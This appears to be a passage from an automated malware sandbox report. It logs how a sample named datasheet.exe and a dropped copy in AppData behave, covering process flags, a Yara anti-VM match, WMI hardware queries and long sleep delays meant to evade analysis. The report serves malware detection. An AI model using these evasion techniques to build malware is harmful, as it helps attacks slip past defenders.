                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: datasheet.exe PID: 2960, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: EhzaIxEFbjyd.exe PID: 6672, type: MEMORYSTR
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\datasheet.exeMemory allocated: 1170000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeMemory allocated: 2D00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeMemory allocated: 1170000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeMemory allocated: 7DF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeMemory allocated: 8DF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeMemory allocated: 8FB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeMemory allocated: 9FB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeMemory allocated: 2BB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeMemory allocated: 2D60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeMemory allocated: 2BE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeMemory allocated: 7AD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeMemory allocated: 8AD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeMemory allocated: 8C80000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeMemory allocated: 9C80000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6202Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 453Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6079Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 521Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1581Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 809Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1511
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8330
                    Source: C:\Users\user\Desktop\datasheet.exe TID: 3320Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 988Thread sleep count: 6202 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3560Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 988Thread sleep count: 453 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1336Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7112Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2896Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe TID: 7236Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\datasheet.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99543Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99411Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99162Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98969Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98641Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98422Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98312Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99761
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99437
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99094
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98984
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98756
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98625
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98480
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98375
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98266
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98155
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98047
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97938
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97813
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97688
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97344
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96218
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95693
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95568
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95313
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95172
